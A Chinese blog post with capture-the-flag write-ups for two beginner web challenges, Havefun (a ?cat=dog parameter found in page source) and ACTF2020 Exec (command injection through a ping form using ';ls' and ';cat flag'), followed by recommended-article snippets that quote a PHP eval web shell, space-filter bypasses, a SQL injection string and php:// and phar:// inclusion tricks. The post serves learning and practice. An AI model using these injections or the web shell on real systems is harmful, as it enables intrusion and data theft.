[极客大挑战 2019]Havefun & [ACTF2020 新生赛]Exec

最新推荐文章于 2024-10-14 16:42:33 发布
最新推荐文章于 2024-10-14 16:42:33 发布
阅读量67 收藏
点赞数
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53386879/article/details/132654307
版权

进来啥都没

那还能咋办

F12大法!

这啥玩意绿不拉几的映入眼帘

翻了翻就这么段有点用,那么现在我们就来进行简单的代码审计

这里用cat接受变量,然后用cat变量中的参数与‘dog’进行比较

然后输出

那还等什么,试试就逝世

/?cat=dog放url后边

成功

flag{d6102262-c9b3-4cfc-8970-2f9d1def24ad}

界面很干净,随便输个IP  ping一下,看看搞什么名堂

看着像能注入的样子

试试192.168.1.1;ls

诶,直接确定了这是Linux系统,而且没有过滤分号和ls

那就遍历目录吧

从根目录开始吧,不然多了自己都乱了

192.168.1.1;cd /;ls

wow意外之喜,看到了flag

进去看看

192.168.1.1;cd /flag;ls

没有东西,他可能不是一个目录

试试cat看看

192.168.1.1;cd /;cat flag

拿到flag

flag{99e7364b-3c18-4acc-bec2-d8b1ea9fa420}
星夜赴科场
关注
[ACTF2020 新生]Upload 1和[GXYCTF2019]Ping Ping Ping 1
qq_44122254的博客
02-16 299
打开靶场环境,发现是文件上传 检查前后端效验情况,检查源代码 存在前端效验,删除前端效验代码进行上传,后端也存在效验,过滤php文件,可选择phtml文件进行上传,写入phtml文件进行上传抓包看看 代码详情如下: 蚁剑连接查看flag [GXYCTF2019]Ping Ping Ping 1 打开靶场显示IP? 进行Linux查看,查看发现有空格过滤, 百度一波,空格过滤的绕过情况 有:%20(space)、%09(tab)、$IFS9、9、9、{IFS}$9、 {IFS}、IFS 都可以 进行
buuctf web
个人笔记
02-19 3601
ctf web
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 5357
BUUCTF--Web篇详细wp。
【BUUCTF Web】WriteUp超详细
qq_62604985的博客
07-10 2458
buutctf web题目题解, 升大三的暑假自己刷来提高能力的,是自己边做边写,暑假期间只要没事情,每天都会写一些题目,最迟晚上更新
BUUCTF-2020寒假刷题记录
qq_33624424的博客
06-26 3426
BUUCTF-2020寒假刷题记录 Web [RoarCTF 2019]Easy Calc 打开源码,看到calc.php,打开看到源码。 在 num 前面加个空格即可绕过 ? num=phpinfo(); calc.php? num=print_r(scandir(chr(47))) 列出目录 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1JiYRIUE-1593173106930)(https://i.loli.net/2020/01/19/8HzGU3tFQPIVa
BUUCTF web第一页WP
东隅的博客
05-13 788
目录 [极客挑战 2019]EasySQL [HCTF 2018]WarmUp [极客挑战 2019]Havefun [ACTF2020 新生]Include [强网杯 2019]随便注 [极客挑战 2019]EasySQL payload: 1' or 1=1-- - 1 flag{deb9ccf8-479a-49c9-8412-6171f1c4b057} [HCTF 2018]WarmUp f12查看源码发现提示source.php, 进入获得源代码 .
部分ctf-web题解
weixin_66669317的博客
12-06 2142
ctfweb部分题解
BUUWeb刷题记录
dangejinghong的博客
04-23 802
但是,如果要接着直接查这个flag就会出现问题了,select等关键词被过滤了,所以我们只能另辟蹊径,根据从网上大佬的wp学习,可以将。file=phar://压缩包/内部文件 phar://xxx.png/shell.php (zip要用#隔开,这个用/)file=php://filter/read=convert.base64-encode/resource=xxxx.php。发现他将空格过滤了,不过通过网上学习,发现可以用一些字符绕过空格,例如。
BUUCTF解题web十一道
qq_45837896的博客
05-26 1364
[2019极客挑战]EASYSQL 到页面里发现是一个登录框 回想注入思路,先判断注入类型,然后尝试登陆绕过 使用万能密码username=’ or 1=1 or ‘1’=‘1’# &password=asd [2019极客挑战]HAVEFUN 打开页面发现是一只猫猫,点了两下拖了两下发现没什么 然后老规矩F12查看有没有提示信息 发现有这么一段代码,可以对页面传参cat,传cat='dog’就执行了一段代码,不知道是什么,尝试了一下直接出了flag… [SUCTF]EASYSQL 进入发现是
buuctf web1
qq_61768489的博客
03-11 3287
[极客挑战 2019]EasySQL [HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; ...
ACTF2020 新生 Upload 1
qq_52715164的博客
04-20 3962
打开网页发现是个文件上传的页面,试着上传php文件,发现不行后, 尝试burp抓包,修改文件后缀,进行前端绕过,发现可行。 具体步骤如下: 1、书写一句话木马,例如: eval和assert: php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。 <?php @eval($_GET["cmd"]); ?> <?php @assert($_POST['a']) ?> create_function和preg_replace函数: create_func
[ACTF2020 新生]Include1
weixin_64160292的博客
03-31 5405
题目:[ACTF2020 新生]Include1 题目来源:buuctf 过程分析: 1、首先看到一个tips,我们打开看看 然后从题目我们知道这个是一个文件包含题,对文件进行php伪协议检测 伪协议 php://input:用来接收POST数据。我们能够通过input把我们的语句输入上去然后执行。 条件: php <5.0 ,allow_url_include=Off 情况下也可以用 php > 5.0,只有在allow_url_fope
BUUCTF-Web-[ACTF2020新生]Upload
m0_61851859的博客
03-27 468
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
BUUCTF-Web- [ACTF2020 新生]Upload
weixin_67813445的博客
03-14 193
本题考察文件上传前端校验以及.phtml的用法
Linux 命令:每日一学,一文说尽打包压缩工具实践
WeiyiGeek 唯一极客IT知识分享
10-12 750
[知识是人生的灯塔,只有不断学习,才能照亮前行的道路]文章目录:0x00 前言简述前面,我们介绍了Linux中文件查找find命令以及与之联用最勤的xargs命令,作者以一个个简单的实例给各位看友展示了在运维中两个命令的使用技巧,今天我们再来介绍一些打包、压缩解压等相关命令。在 Linux 系统中,我们经常需要使用到压缩和解压文件,使用压缩文件可以减少文件大小,从而减少存储空间,以及在网络传输...
Linux从小白到高手》综合应用篇:详解Linux系统调优之内存优化
qq_45732829的博客
10-11 1003
内存是影响Linux性能的主要因素之一,内存资源的充足与否直接影响应用系统的使用性能。内存调优的主要目标是合理分配和利用内存资源,减少内存浪费,提高内存利用率,从而提升系统整体性能。
Linux】解读信号的本质&相关函数及指令的介绍
YYDsis的博客
10-14 716
一.信号的本质与相关概念1.体现中断的例子:.系统定义的信号列表1.用kill -l命令可以察看系统定义的信号列表2.(ps&kill&raise&abort)进程指令&信号相关函数【总结】【1】ps指令【2】kill&raise函数介绍与演示【3】abort函数介绍与演示三.产生信号的四种方式1.通过终端按键产生信号(Core Dump)2.调用系统函数向进程发信号3.由软件条件产生信号4.硬件异常产生信号
linux----相对和绝对以及特殊路径
fuvuof的博客
10-11 248
绝对路径:以根目录为起点,在cd命令中的格式为:cd /##/##/目标目录。#相对路径:以当前目录为起点,在cd命令中的格式为:cd ##/##/目标目录。
Linux】ioctl分析
最新发布
目标:MVP
10-14 1026
一个字符设备驱动通常会实现常规的openreleaseread和write接口,但是如果需要扩展新的功能,通常以ioctl接口的方式实现。fill:#333;user spacevfsdriverioctl()ulocked_ioctl()或compat_ioctl()user spacevfsdriver。
[ACTF2020 新生]Exec 1
09-19
关于 [ACTF2020 新生]Exec 1 的题目中的命令注入问题,根据引用的内容来分析,可以使用命令注入来解题。在这道题目中,使用命令注入的方式进行解题,首先通过测试命令 "ping 127.0.0.1" 来验证是否可以执行命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值